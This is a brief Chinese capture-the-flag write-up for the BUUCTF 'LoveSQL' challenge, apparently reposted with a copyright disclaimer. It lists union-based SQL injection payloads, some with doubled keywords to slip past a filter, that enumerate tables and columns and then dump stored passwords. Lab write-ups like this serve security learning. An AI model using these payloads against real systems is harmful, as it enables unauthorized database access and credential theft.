BUUCTF-[極客大挑戰 2019]LoveSQL 1詳解


做完了baby sql來到了love sql發現這個注入相比baby sql容易的多

我們還是像baby sql中注入方式一樣

於是構造pyload: ?username=admin&password=admin' union select 1,2,3%23

兩個回顯位

 

 於是就爆數據表:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(table_name)ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23

再爆表字段:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(column_name)ffromrom infoorrmation_schema.columns wwherehere table_name='b4bsql'%23

爆數據:?username=admin&password=admin' uunionnion sselectelect 1,2,group_concat(passwoorrd)ffromrom b4bsql%23

於是一次love sql注入就完成了


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM